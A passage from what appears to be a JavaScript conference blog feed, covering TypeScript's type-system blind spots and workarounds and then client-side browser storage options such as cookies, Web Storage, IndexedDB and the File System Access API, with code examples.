}[number];

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = { foo: 1337 } | { bar: 9001 }

Listing 21: Two tuples become one object

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = UnionToIntersection<{
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
}[number]>;

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = { foo: 1337, bar: 9001 }
// Strictly speaking { foo: 1337 } & { bar: 9001 }

The result is syntactically a bit strange, but at the type level it does what the combine() function does in the runtime area: two tuples in, combined object out (Listing 22).

Listing 22: Combine Type vs. Combine Function

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Type "Test" = { foo: 1337, bar: 9001 }

let test = combine(["foo", "bar"], [1337, 9001]);
// Value "test" = { foo: 1337, bar: 9001 }

And if we have a type that models the exact same operation as a runtime function, we can logically use the former to annotate the latter. Right?

The problem with the imperative iteration

Before we add Combine<K, V> to the signature of combine(keys, values), we should fire up TypeScript and ask what it thinks of the current state of our function (without return type annotation). The compiler is not impressed (Listing 23).

Listing 23: Current state of combine()

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj = {};
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i]; // <- Error here
  }
  return obj;
}

The key part of the error message is “No index signature with a parameter of type ‘string’ was found on type ‘{}’”. The reference to the type {} comes from the initialization of the obj variable two lines earlier. Since there is no type annotation, the compiler activates its type inference and determines the type {} for obj based on its initial value, the empty object. Naturally, this means we can’t add any additional fields to this type. But is this type even correct? After all, the function is supposed to return Combine<K, V> as the type. So we annotate the variable at initialization with the type it should have at the end (Listing 24).

Listing 24: combine() with Combine<K, V> as annotation

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj: Combine<K, V> = {}; // <- Error here
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

Another error appears. This time, TypeScript reports “Type ‘{}’ is not assignable to type ‘Combine<K, V>’”, which is also understandable. After all, we’re claiming that the variable obj contains the type Combine<K, V> but we’re initializing it with the incompatible value {}. That can’t be correct either. So, what is the correct approach?

The truth is, nothing is correct. The operation that combine(keys, values) performs is not describable with TypeScript in the way it’s implemented here. The problem is that the result object obj mutates from {} to Combine<K, V> in several intermediate steps during the for loop, and that TypeScript doesn’t understand such state transitions. The whole point of TypeScript is that a variable has exactly one type, and it can’t change types (unlike in vanilla JavaScript). However, such type changes are essential in scenarios where objects are iteratively assembled because each mutation represents a new intermediate state on the way from A to B. TypeScript can’t model these intermediate states, and there is no correct way to equip the combine(keys, values) function with type annotations.

What to do with intermediate states that can’t be modeled?

The TypeScript type system is a huge system of equations in which the compiler searches for contradictions. This always happens for the program as a whole and without executing the program. This means that, by design, TypeScript can’t fully understand various language constructs and features, no matter how hard we try. Under these circumstances, the question arises: if we can’t do it right, what should we do instead?

One option is to align the runtime code more closely with the limitations of the type system. After all, there are various means of functional programming in runtime JavaScript. Instead of writing types that are oriented towards runtime JavaScript, it’s often possible to write runtime JavaScript that is based on the types. However, this doesn’t always work and may not be feasible in some teams. Some developers may enjoy writing JavaScript code in such a way that every loop is replaced by recursion, while others would like to keep their imperative language constructs, especially async/await and try/catch.

The more pragmatic solution is to accept the possibilities and limitations of our tools and work with what we have. Unmodelable intermediate states are bound to occur when writing low-level imperative code. If the type system can’t represent them, we need to handle them in other ways. Unit tests can ensure that the affected functions do what they’re supposed to do, documentation and code comments are always helpful, and for an extra layer of safety, we can use runtime type-checking if needed.

I’ve adapted a feature from the programming language Rust for functions with an imperative core that is inscrutable for TypeScript. Rust’s type system is stricter than TypeScript’s, enforcing much more granular rules for handling data and objects. However, there is a way out: code blocks marked with the unsafe keyword can (to some extent) perform operations that the type system would normally prevent (Listing 25).

Listing 25: unsafe in Rust

// This Rust program uses the C language's foreign
// function interface for the abs() function,
// which the Rust compiler cannot guarantee anything about
extern "C" {
  fn abs(input: i32) -> i32;
}

// To be able to call the C function abs(),
// the corresponding code must be wrapped in "unsafe"
fn main() {
  unsafe {
    println!(
      "Absolute value of -3 according to C: {}",
      abs(-3)
    );
  }
}

In its core idea, it’s somewhat comparable to the TypeScript type any, as in both cases developers assume responsibility for what the type checker would normally do. The advantage of unsafe in Rust is that it directly signals that the compiler doesn’t guarantee type safety for the affected area and that maximum caution is required when using it. This is precisely what we want to express for our combine(keys, values) function. First, we have to get the function to work by typing the result object as any (Listing 26).

Listing 26: combine() with any

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj: any = {}; // <- anything goes
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

This makes the code in the function executable and the compiler no longer complains, since any allows everything. We can now use our type Combine<K, V> to annotate the return type (Listing 27).

Listing 27: combine() with any and Combine<K, V>

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V): Combine<K, V> {  // <- works
  /* Rest */
}

This works because a value of type any may also be assigned to another, stricter type. This function now has a very well-defined interface with strict input and output types, but a core that isn’t protected by the type system. For trivial functions, it’s sufficient to ensure correct functioning with unit tests, and to make the character of the function even more obvious, you could add unsafe to its name (Listing 28).

Listing 28: unsafeCombine()

function unsafeCombine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V): Combine<K, V> {
  /* Rest */
}

Anyone who calls this function can tell from its name that special care is required. Reading the source code makes it clear that the any annotation on the return object wasn’t added out of desperation, time pressure, or inexperience by the developers, but rather as a workaround for a TypeScript blind spot based on careful consideration. No tool is perfect (especially not TypeScript), and dealing with a tool’s limitations confidently and pragmatically is the hallmark of true professionals.

Blind spot 3: Side effects of mix-in modules

For most developers, ECMAScript modules are synonymous with the keywords import and export, but these don’t determine whether a piece of JavaScript is considered a module. For a JS engine, “ECMAScript module” is primarily a separate loading and operating mechanism for JavaScript programs in which

  1. Permanent strict mode applies without opt-out
  2. Programs, similar to scripts with the defer attribute, are loaded asynchronously and executed in browsers only at the DOMContentLoaded event
  3. import and export can be used

Thus, the following JavaScript program can be considered and treated as an ECMAScript module:

// hello.js
window.alert("Hello World!");

This mini-module contains no code that violates strict mode. It can handle contact with a fully processed DOM without crashing and can be easily loaded as a module by browsers:

<script type="module" src="hello.js"></script>

The presence of the keywords import and export indicates that a JavaScript program is intended to be a module and is only executable in module mode. However, their absence doesn’t mean a program can’t be a module. In most cases, using import and/or export in modules makes sense, but not always: For example, if you want to activate a global polyfill, you don’t have to export anything. Instead, you can directly modify the relevant global objects. This use case may seem a bit unusual (after all, who regularly writes new polyfills?), but the world might be a little better if this use case weren’t so rare.

Modularity vs. fluent interfaces

Zod is a popular and powerful data validation library for JavaScript and TypeScript. It offers a highly convenient, fluent interface for describing data schemas, validates data against those schemas, and, as a special treat, can derive TypeScript types from the schemas (Listing 29).

Listing 29: Zod in action

import { z } from "zod";

const User = z.object({
  name: z.string(),
  mail: z.string().email(),
});

User.parse({
  name: "Test",
  mail: "[email protected]",
}); // > OK, no error

type User = z.infer<typeof User>;
// > TS-Type { name: string, mail: string }

The fluent interface with the simple chaining of method calls makes Zod particularly attractive. However, this chaining comes at a price: the z object contains every schema validation feature of Zod at all times, even if, as in the example above, only the object, string, and email functions are used. The result is that, when compiled and minified with esbuild, the 14 lines of code shown above turn into a bundle of over 50 kB. For frontend applications where loading performance is an issue, the use of Zod is therefore out of the question.

This doesn’t mean there is anything wrong with Zod. The inclusion of the entire library’s code in the bundle, even when only one feature is used, is an unavoidable result of its highly convenient API design. This isn’t an issue when used on the server side. For Zod to work, the z object must be a normal JavaScript object with all the features, which means that bundler-based tree shaking (dead code elimination) can’t be applied. The Zod developers decided to accept a larger bundle in exchange for a better API design, perhaps because the “frontend” use case was not that important to them, or because they considered convenience and developer experience to be more important. And that’s perfectly fine.

For comparison, the self-proclaimed “<1-kB Zod alternative” Valibot uses a completely different API design to Zod to take up only a few bytes (Listing 30).

Listing 30: Valibot in action

import {
  type Output,
  parse,
  object,
  string,
  email,
} from "valibot";

const User = object({
  name: string(),
  mail: string([email()]),
});

parse(User, {
  name: "Test",
  mail: "[email protected]",
}); // > OK, no error

type User = Output<typeof User>;
// > TS-Type { name: string, mail: string }

We see the same feature set as Zod with just one key difference: the fluent interface is no longer supported. Chained conditions (e.g., “this must be a string and the string must be an email address”) are modeled by manually imported and manually concatenated functions. This makes tree shaking easy for module bundlers like esbuild, but the API is no longer as convenient.

In other words, fluent interfaces are nice, but they don’t always align with the performance optimizations necessary for frontend performance. Or do they?

The Versatile Swiss Army Knife (in JavaScript)

A Zod-style fluent interface can be implemented in JavaScript as well as in TypeScript using a few object methods that return this (Listing 31).

Listing 31: Basic fluent interface

const fluent = {
  object() {
    return this;
  },
  string() {
    return this;
  },
  email() {
    return this;
  },
}

fluent.string().email(); // Runs!

If we step away from the constraints of type safety and delve into pure JavaScript, we can assemble the object behind the fluent interface piece by piece rather than declaring it centrally (Listing 32).

Listing 32: Piece-wise fluent interface

const fluent = {};

fluent.object = function() {
  return this;
};

fluent.string = function() {
  return this;
};

fluent.email = function() {
  return this;
};

fluent.string().email(); // Success!

In JavaScript, there’s no reason not to split the piecemeal assembly into individual modules. We just need to ensure that there is some kind of singleton for the Fluent object, which could be implemented, for example, by a core module imported everywhere (Listing 33).

Listing 33: Modularized Fluent Interface

// Core Module "fluent.js"
const fluent = {};
export { fluent };

// Module "object.js"
import { fluent } from "./fluent.js";
fluent.object = function () {
  return this;
};

// Module "string.js"
import { fluent } from "./fluent.js";
fluent.string = function () {
  return this;
};

// Module "email.js"
import { fluent } from "./fluent.js";
fluent.email = function () {
  return this;
};

The core module fluent.js initializes an object that is imported and extended by all feature modules. This means that only explicitly imported features can be used (and take up kilobytes), but we retain a fluent interface comparable to Zod (Listing 34).

Listing 34: Modularized Fluent Interface in Action

// main.js
import { fluent } from "./fluent.js";
import "./string.js"; // patches string into "fluent"
import "./email.js"; // patches email into "fluent"

fluent.string().email(); // Works!
fluent.object(); // Error: object.js not imported

This minimal implementation of the modular Fluent pattern is clearly just a demonstrator showing what could be possible in principle: modularity and method chaining peacefully united. Granted, outside of the odd polyfill, hardly anyone writes modules that are pure side effects patching arbitrary objects. But why not? After all, we could have fluent interfaces and tree shaking. Admittedly, there is a small detail known as “TypeScript” that complicates matters.

Declaration merging, but unconditionally

TypeScript is no stranger to the established JavaScript practice of patching arbitrary objects. It’s an official part of the language via declaration merging. If we create two interface declarations with identical names, this isn’t considered a naming collision, but a distributed declaration (Listing 35).

Listing 35: Declaration Merging

interface Foo {
  a: number;
}

interface Foo {
  b: string;
}

declare let x: Foo;
// { a: number; b: string }

TypeScript uses this mechanism primarily to support extensions of string-based DOM APIs, such as document.createElement(). This function is known to be able to fabricate an instance of an appropriate type from an HTML tag (Listing 36).

Listing 36: document.createElement() in action

let a = document.createElement("a");
// a = HTMLAnchorElement
let t = document.createElement("table");
// t = HTMLTableElement
let y = document.createElement("yolo");
// y = HTMLElement (base type)

It’s true that document.createElement() produces an HTMLAnchorElement from the tag a, that it treats the tag table as the source of an HTMLTableElement, and that, as of August 2024, no specified element <yolo> exists. But how does TypeScript know all this? The answer is simple: at the core of TypeScript’s DOM type definitions, there is a large interface declaration that maps HTML tags to subtypes of HTMLElement (Listing 37).

Listing 37: HTMLElementTagNameMap

interface HTMLElementTagNameMap {
  "a": HTMLAnchorElement;
  "abbr": HTMLElement;
  "address": HTMLElement;
  "area": HTMLAreaElement;
  "article": HTMLElement;
  "aside": HTMLElement;
  "audio": HTMLAudioElement;
  "b": HTMLElement;
  ...
}

The type definition of document.createElement() uses type-level programming to derive from this interface the type of instance the function returns for a given HTML tag – with the basic HTMLElement as a fallback level for unknown HTML tags. And what do we do when unknown HTML tags become known HTML tags through Web Components? We merge new fields into the interface.

Listing 38: Declaration merging for web components

export class MyElement extends HTMLElement {
  foo = 42;
}

window.customElements.define("my-el", MyElement);

declare global {
  interface HTMLElementTagNameMap {
    "my-el": MyElement;
  }
}

let el = document.createElement("my-el");
el.foo; // number - el is a MyElement

The class declaration or the call to customElements.define() tells the browser at runtime that a new HTML element with a matching tag now exists, while the global interface declaration informs the TypeScript compiler about this new element. It’s therefore possible to extend global objects and have TypeScript record them correctly, and it is not even particularly difficult.

What happens if we move the above web component into its own module in our TypeScript project, fail to import this module, and still call document.createElement("my-el") (Listing 39)?

Listing 39: Unconditional Declaration Merging

// Import disabled!
// import "./component";

const el = document.createElement("my-el");
el.foo; // number - el is still a MyElement

The commented-out component remains completely unknown to the browser, while TypeScript still assumes that the affected HTML tag can be used. This happens because TypeScript types are considered on a per-package basis. If a global type declaration is part of an imported package, it’s considered to be in effect. At the individual module level, TypeScript can’t understand that specific imports are needed to implement the effect of the declared types at runtime.

What to do about the side effects of mix-in modules?

In principle, handling this cleanly requires a somewhat blunt workaround: since TypeScript considers types on a per-package rather than a per-module basis, we can convert the relevant modules into (quasi-)packages. Depending on the build setup, this can require more or less effort. The main step is to create a new folder for our module packages in the project and to use the exclude option to remove it from the view of the main project’s tsconfig.json. The modules can now be moved to this folder hidden from the compiler, meaning that TypeScript only processes the type declarations within them when the corresponding modules/packages are actually imported.

The tricky question now is what our project and build system will accept as a “package”. If we don’t run the TypeScript compiler tsc at all, or only with the options noEmit or emitDeclarationOnly (i.e. when the TypeScript compiler doesn’t have to output JavaScript, but at most d.ts files), we can activate the compiler option allowImportingTsExtensions. This allows us to directly import the .ts files from the module packages folder, and thus activate only those global declarations that are actually imported (Listing 40).

Listing 40: Conditional declaration merging through packages

// packages/foo/index.ts
declare global {
  interface Window {
    foo: number; // new: window.foo
  }
}
export {}; // Boilerplate, ignore!

// packages/bar/index.ts
declare global {
  interface Window {
    bar: string; // new: window.bar
  }
}
export {}; // Boilerplate, ignore!

// index.ts
import "./packages/foo/index.ts";
window.foo; // <- Imported, works!
window.bar; // <- Not imported, error!

If, on the other hand, we need the JavaScript output of tsc, it gets a bit more complicated. In this case, the compiler option allowImportingTsExtensions isn’t available and the module packages have to be upgraded to more or less “correct” packages, including their own package.json. Depending on how many such “packages” you want to end up with in your project, this additional effort can either remain manageable or escalate into something completely unacceptable.

Side effects of mix-in modules remain a blind spot of TypeScript because, due to its fundamental design, the types known to the TypeScript compiler are determined at the package level, not at the level of individual ECMAScript modules. Any workaround we can come up with has major or minor drawbacks. We can either accept them, try to minimize their effects by adjusting our project or build set-up, or simply accept the blind spot. But is it really a problem if the type system thinks an API is available when it isn’t? For a module with a fluent interface, definitely. For web components, maybe not. And for other use cases? It depends on the circumstances.

Conclusion: TypeScript isn’t perfect

TypeScript aims to describe JavaScript’s behavior using a static type system, and it does this far better than we might expect. Almost every bizarre behavior of JavaScript can be partially managed by the type checker, with true blind spots existing only in a few peripheral aspects. However, as we’ve seen in this article, these fringe aspects are not without practical relevance, and as TypeScript professionals, we need to acknowledge that TypeScript is not perfect.

So how do we deal with these blind spots in our projects? Personally, I’m a big fan of a pragmatic approach to using tools of all kinds. Tools like TypeScript are machines that we developers operate, not the other way around. When in doubt, I prefer to occasionally accept an any or a few data types that are 99% correct. If an API can be significantly improved through elaborate type juggling, it may justify spending hours in the type-level coding rabbit hole.

However, fighting against the fundamental limitations of TypeScript is rarely worth the effort. There is no prize for the smallest possible number of anys, no bonus for particularly complex type constructions, and no promotion for a function definition that is 0.1% more watertight. What matters is a functioning product, maintainable code, and efficiency in execution and development – always considering what is possible given the current circumstances and available tools.

The post TypeScript’s Limitations and Workarounds appeared first on International JavaScript Conference.

]]>
Exploring the Power of Web Browser Storage https://javascript-conference.com/blog/web-browser-storage/ Wed, 25 Sep 2024 12:10:38 +0000 https://javascript-conference.com/?p=91610 In modern web development, understanding web browser storage options is essential for optimizing both performance and user experience. This comprehensive guide explores the most powerful client-side storage solutions, including cookies, LocalStorage, IndexedDB, and Session Storage, and how they can be leveraged to improve your web applications. We also dive into more advanced techniques like WebSQL, the File System Access API, and Cache Storage in combination with Service Workers for effective offline storage and data synchronization. Whether you’re aiming to enhance browser performance or provide a seamless offline experience, mastering these JavaScript storage solutions is a must for any web developer.

The post Exploring the Power of Web Browser Storage appeared first on International JavaScript Conference.

]]>
When considering how to store information for a website or web application, you might initially think of building a server-side API that stores data in a relational database such as MariaDB or a document database like MongoDB. Yet, the browser offers numerous storage options that can be leveraged for various needs.

Understanding the different storage facilities inside modern browsers is crucial for web developers. By looking at their pros and cons, you can make smart choices for your next project. This will help you create efficient and effective web applications.

1. Cookies

Website cookies, or HTTP cookies, are tiny text files stored in a user’s web browser when they visit a web page. These cookies can contain information that helps the website remember user data or preferences and improve the browsing experience.

 

Cookies are commonly used for authentication and session management. When a user logs into a website, a cookie with their login information is created on the server and stored in the web browser. This allows the website to recognise the user and keep them logged in across different page loads.

 

In addition, cookies are often used for personalisation purposes. They can store user preferences, such as language settings or display preferences so that the website can provide a customised user experience.

Setting cookies

Setting cookies with JavaScript Code is somewhat cumbersome because it’s written as a string containing all the cookie’s attributes.

 

Example 1.1

Setting cookies with JavaScript Code
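The original code screenshot isn’t reproduced here; a minimal sketch of what the following description covers (cookie name Sandwich, value Turkey, root path, one-year max-age) might look like this:

document.cookie = "Sandwich=Turkey; path=/; max-age=31536000"; // 31536000 seconds = one year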

In example 1.1, a cookie is created and saved with the name Sandwich and the value Turkey separated by an equal sign. The string also contains the cookie’s path and expiration date.

 

By default, the path is the current path, the page’s location that creates the cookie. If that path is a website subfolder, like test.com/cookies, the cookie will only be available for pages that are descendants of that path. If you want the cookie to be available on the whole website, make sure you include the root path, as in the example.

 

The max-age attribute defines a cookie’s end date. You can provide a date using the expires attribute in GMT format, but giving a max-age in seconds is easier. In example 1.1, the cookie will be deleted after one year of storage. Omitting this attribute will turn this cookie into a session cookie, which means it will be deleted after closing the browser.

 

Cookies are accessible through the browser DevTools. In Safari and Firefox, they are available on the Storage tab, and in Chrome and Edge, they are found on the Application tab. Be aware that users can also access the cookies this way and alter them at will. The same goes for all the storage options mentioned further in this article.

Deleting cookies

If needed, the cookie can be removed by setting the max-age to 0, as shown in example 1.2. It is matched on the name and path; the cookie’s value is irrelevant in this case.

 

Example 1.2

Deleting cookies with JavaScript Code
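A minimal sketch of the deletion just described (the cookie from example 1.1, removed by setting max-age to 0) could be:

document.cookie = "Sandwich=; path=/; max-age=0"; // matched on name and path; the value is irrelevant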

A shopping website can also use cookies to remember the user’s shopping cart items. A benefit of using a cookie is that it is automatically sent to the web server on each request, giving the server direct access to the data. I prefer to store the contents of a shopping cart in a database on the server side and only save a unique reference for that cart in either a cookie or local storage.

Cookie Store

Setting a cookie, as in example 1.1, is a synchronous action. This means that any subsequent JavaScript execution has to wait until it is finished. Interacting with a cookie is also impossible from within a Service Worker.

 

To solve both these problems and to overcome the tedious process of setting a cookie with a string, the Cookie Store is available in Chromium-based browsers, such as Chrome, Edge, and most common Android browsers.

Service Worker

A Service Worker is a JavaScript file that mediates between the browser and the server. It can intercept each request, alter the response coming from the server, or answer the request itself. It runs in a separate thread so that it won’t slow down any script related to the website. It also doesn’t have access to the website’s Document Object Model (DOM) or to cookies set in the browser, except through the Cookie Store.

Setting cookies

Setting cookies with the Cookie Store is more straightforward, as shown in example 1.3.

 

Example 1.3

Setting cookies with the Cookie Store
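The screenshot isn’t reproduced here; a minimal sketch, assuming an async context in a Chromium-based browser, could be:

await cookieStore.set("Favorite", "Chocolate"); // creates a session cookie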

This will create a session cookie named Favorite with the value Chocolate. Passing an object can set more options, like the expiration date (unfortunately, max-age is unavailable); see example 1.4.

 

Example 1.4

Setting cookies with the Cookie Store
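A minimal sketch of the options-object variant just described (the path value is an assumption):

await cookieStore.set({
  name: "Favorite",
  value: "Chocolate",
  path: "/",
  expires: Date.now() + 365 * 24 * 60 * 60 * 1000, // one year from now
});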

Deleting cookies

Deleting cookies is easy; a separate method only requires the cookie name (example 1.5).

 

Example 1.5

Deleting cookies with the Cookie Store
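A minimal sketch of the deletion method mentioned above:

await cookieStore.delete("Favorite");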

2. Web Storage

Web Storage is a mechanism for storing data as short- or long-term key-value pairs. Since the keys and values are always strings, objects and arrays must be converted, as shown in examples 2.1 and 2.2.

 

Example 2.1: converting objects

Web storage - Converting objects

Example 2.2: converting arrays

Web storage - Converting arrays
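The screenshots for examples 2.1 and 2.2 aren’t reproduced here; a minimal sketch of the conversions they describe, with made-up data, might look like this:

// Objects (example 2.1)
const user = { name: "Test", language: "en" };
localStorage.setItem("user", JSON.stringify(user));
const storedUser = JSON.parse(localStorage.getItem("user"));

// Arrays (example 2.2)
const groceries = ["Bread", "Milk"];
localStorage.setItem("groceries", JSON.stringify(groceries));
const storedGroceries = JSON.parse(localStorage.getItem("groceries"));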

Local Storage

The data stored in Local Storage is not bound to a session (tab or window) and will persist and be available on the next visit. However, data saved in a “private browsing” or “incognito” session will be deleted afterwards.

 

Web Storage provides straightforward methods to store, retrieve and delete data.

 

Example 2.3

Store data in Local storage
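A minimal sketch of those methods (key and value are made up):

localStorage.setItem("favorite", "Chocolate"); // store
localStorage.getItem("favorite");              // retrieve: "Chocolate"
localStorage.removeItem("favorite");           // delete a single entry
localStorage.clear();                          // delete everything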

A practical example is used on the website cfp.watch, where favourites are stored in Local Storage. Next time the user visits the website (with the same browser), these favourites will be available again.

Session Storage

Local Storage and Session Storage work the same way, with one big exception: data stored in Session Storage is cleared when the tab or browser is closed.

 

The available methods are similar.

Session storage
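A minimal sketch with made-up data:

sessionStorage.setItem("step", "2");
sessionStorage.getItem("step");    // "2" until the tab or browser is closed
sessionStorage.removeItem("step");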

Session Storage can store temporary data or state for a web application when you’re not using a state management library or framework like Redux or Pinia.

3. WebSQL

WebSQL was an attempt to bring SQLite to the browser to provide a robust way of storing and querying data. However, not all browser vendors were convinced, and Mozilla didn’t even attempt to implement it in their Firefox browser.

 

Another reason it wasn’t well adopted was probably the horrible API for writing queries with callbacks, as shown in example 3.1.

 

Example 3.1

WebSQL
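The screenshot isn’t reproduced here; a minimal sketch of the callback-heavy WebSQL style described above (database and table names are assumptions, and the API itself is long deprecated) might look like this:

const db = openDatabase("groceries", "1.0", "Grocery list", 2 * 1024 * 1024);

db.transaction(function (tx) {
  tx.executeSql("CREATE TABLE IF NOT EXISTS items (name)");
  tx.executeSql("INSERT INTO items (name) VALUES (?)", ["Bread"]);
  tx.executeSql(
    "SELECT * FROM items",
    [],
    function (tx, results) {
      console.log(results.rows); // success callback
    },
    function (tx, error) {
      console.error(error.message); // error callback
    }
  );
});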

Support for WebSQL is only available in older versions of the major browsers and some browsers on Android.

4. IndexedDB

IndexedDB has more or less replaced WebSQL, but as a NoSQL database.

 

IndexedDB tables are referred to as object stores, and they support transactions and indexes. Like Web Storage, data is stored as key-value pairs, but values aren’t limited to strings: they can be anything from strings to objects, arrays, or even binary data.

 

Example 4.1

IndexedDB
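A minimal sketch of the call described below (database name and version are assumptions):

const request = indexedDB.open("groceries", 1);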

By calling the open method, a specific database (first parameter) will be opened or created if that database doesn’t exist yet. The second parameter of this method is the database’s version. When this version is higher than the current version (including non-existent), it will trigger the onupgradeneeded event, as shown in example 4.2.

 

Example 4.2

open method Indexed DB
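A minimal sketch of handling this event (store name and key path are assumptions):

const request = indexedDB.open("groceries", 1);

// Fired when the database is created or opened with a higher version number
request.onupgradeneeded = (event) => {
  const db = event.target.result;
  db.createObjectStore("list", { keyPath: "id" });
};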

In this event, actions depending on the version can be performed, like creating tables/object stores, indexes or inserting data.

 

IndexedDB will fire an onsuccess event when everything went right and an onerror event in case of errors, including the specific error.

 

Example 4.3

IndexedDB
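A minimal sketch of the success and error handlers plus a transaction, continuing the assumptions above:

const request = indexedDB.open("groceries", 1);

request.onerror = (event) => {
  console.error("Could not open database:", event.target.error);
};

request.onsuccess = (event) => {
  const db = event.target.result;
  const tx = db.transaction("list", "readwrite");
  tx.objectStore("list").add({ id: 1, name: "Bread" });
};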

After successfully opening the database, you can start a transaction to store data, for instance. Transactions are especially useful when multiple actions are performed, and none are allowed to fail. A transaction will ensure that all actions are reverted in case of a failure.

idb

While the syntax for using IndexedDB is much better than for WebSQL, there is still room for improvement, which is why Jake Archibald, formerly of Google, wrote a library called idb. It uses promises instead of events, enabling developers to use async/await. It also provides shortcuts for common transactions like getAll, put, and delete.

 

Example 4.4 shows a shorter and easier implementation of examples 4.1 through 4.3 with the idb library.

 

Example 4.4

shorter and easier implementation
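The screenshot isn’t reproduced here; a minimal sketch using idb’s openDB, put and getAll shortcuts (names and data are assumptions, and a module with top-level await is assumed) might look like this:

import { openDB } from "idb";

const db = await openDB("groceries", 1, {
  upgrade(db) {
    db.createObjectStore("list", { keyPath: "id" });
  },
});

await db.put("list", { id: 1, name: "Bread" });
const items = await db.getAll("list");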

Data Synchronization

IndexedDB is an excellent solution for ensuring that data is always available for users, even offline or with a lousy internet connection. On startup, data from the server can be synced to IndexedDB for faster response, and when there is an active internet connection, added or changed data can be sent back to the server.

 

Examples 4.5 through 4.7 show a rudimentary implementation of this using a Web Worker. A Web Worker is similar to a Service Worker in that it runs in a separate thread and doesn’t block the website, but it doesn’t intercept any network requests.

 

Example 4.5

rudimentary implementation using a Web Worker
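A minimal sketch of what a utils.js along these lines could contain (the function names getDatabase and saveRecord and the database layout are assumptions):

// utils.js - a sketch, not the original code
import { openDB } from "idb";

export function getDatabase() {
  return openDB("groceries", 1, {
    upgrade(db) {
      db.createObjectStore("list", { keyPath: "id" });
    },
  });
}

export async function saveRecord(record) {
  const db = await getDatabase();
  await db.put("list", record);
}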

utils.js has shared methods to open or create the database and save data.

 

Example 4.6

rudimentary implementation using a Web Worker
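A minimal sketch of a worker.js behaving as described below (the mock-server URL, the helper names from utils.js and the use of a module worker are assumptions):

// worker.js - a sketch, not the original code
import { getDatabase, saveRecord } from "./utils.js";

self.addEventListener("message", (event) => {
  if (event.data === "CheckNetworkState") {
    checkNetworkState();
  }
});

function checkNetworkState() {
  // Check every 3 seconds whether the user agent is online
  setInterval(async () => {
    if (!navigator.onLine) return;
    const db = await getDatabase();
    const records = await db.getAll("list");
    await syncRecords(records.filter((record) => !record.synced));
  }, 3000);
}

async function syncRecords(records) {
  for (const record of records) {
    // Assumed endpoint of the local mock server
    const response = await fetch("http://localhost:3000/records", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(record),
    });
    if (response.ok) {
      await saveRecord({ ...record, synced: true });
    }
  }
}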

worker.js imports the idb library and helper methods of utils.js.

 

It will listen to messages sent to it and call the method checkNetworkState when the message equals CheckNetworkState. This method will check every 3 seconds whether the user agent is online. If so, it will attempt to update the server (in this case, a local mock server) by sending a POST request (method syncRecords) for every record where synced is false. When successful, the record will be updated and synced will be set to true.

Example 4.7

rudimentary implementation using a Web Worker
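A minimal sketch of a script.js that starts the worker as described below:

// script.js - a sketch, not the original code
document.addEventListener("DOMContentLoaded", () => {
  // type: "module" so the worker can use import statements
  const worker = new Worker("./worker.js", { type: "module" });
  worker.postMessage("CheckNetworkState");
});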

script.js will instantiate a new worker at the DOMContentLoaded event and post a message to it to start the sync process to the server.

 

The DOMContentLoaded event fires when the HTML document has been completely parsed and all deferred scripts have been downloaded and executed.

5. File System Access API

The File System Access API enables developers to interact with the user’s file system. Two prominent examples of web applications that use this are Adobe Photoshop Online and Visual Studio Code.

 

Reading and writing files is pretty straightforward using file pickers with options to, for instance, set the file type, folder, suggested file name or allowed extensions.

 

Example 5.1

The File System Access API
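The screenshots aren’t reproduced here; a minimal sketch of opening a file through the picker and reading it, as the next paragraph describes (the accepted file type is an assumption, and an async context is assumed):

// Let the user pick a file, then read its contents as text
const [fileHandle] = await window.showOpenFilePicker({
  types: [{ description: "Text files", accept: { "text/plain": [".txt"] } }],
});
const file = await fileHandle.getFile();
const contents = await file.text();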

Reading a file starts with acquiring a file handle through the file picker, actually getting the file and reading the contents.

 

Example 5.2

The File System Access API
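A minimal sketch of saving a file, as described in the following paragraph (suggested name, file type and contents are assumptions):

// Let the user pick a target location, then create and write the file
const fileHandle = await window.showSaveFilePicker({
  suggestedName: "notes.txt",
  types: [{ description: "Text files", accept: { "text/plain": [".txt"] } }],
});
const writable = await fileHandle.createWritable();
await writable.write("Hello from the File System Access API");
await writable.close();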

Saving a file also requires a file handle from the file picker to create and write a file.

 

In example 4.4, a grocery list IndexedDB object store was created, and 1 item was added. With the File System Access API, it’s now possible to export this to a text file, as shown in examples 5.3 through 5.5.

 

Example 5.3

The File System Access API

Example 5.4

The File System Access API
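The screenshots for examples 5.3 and 5.4 aren’t reproduced here; a minimal sketch of the export they describe, combining the idb code from example 4.4 with a save file picker (names are assumptions), might look like this:

import { openDB } from "idb";

// Read the grocery list stored in IndexedDB (see example 4.4)
const db = await openDB("groceries", 1);
const items = await db.getAll("list");

// Let the user pick a target file and write the list to it
const fileHandle = await window.showSaveFilePicker({
  suggestedName: "grocery-list.txt",
});
const writable = await fileHandle.createWritable();
await writable.write(items.map((item) => item.name).join("\n"));
await writable.close();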

Example 5.5: contents of file

File Contents

 

The File System Access API is still experimental and is currently only supported by Chromium-based browsers on the desktop. Its predecessor is the File API.

File API

The older File API, by contrast, never touches the user’s actual file system and only works with files inside the browser’s sandbox.

 

Files can only be read and must be provided to the browser using input type="file" or via drag and drop.

 

Example 5.6 shows how to add a listener to a file input, read the file, and display it.

 

Example 5.6

The File System API
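The screenshot isn’t reproduced here; a minimal sketch of the listener just described (the input and output selectors are assumptions) might look like this:

const input = document.querySelector("input[type=file]");

input.addEventListener("change", () => {
  const [file] = input.files;
  const reader = new FileReader();
  reader.addEventListener("load", () => {
    // Assumed output element; adjust the selector to your page
    document.querySelector("#output").textContent = reader.result;
  });
  reader.readAsText(file);
});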

6. AppCache

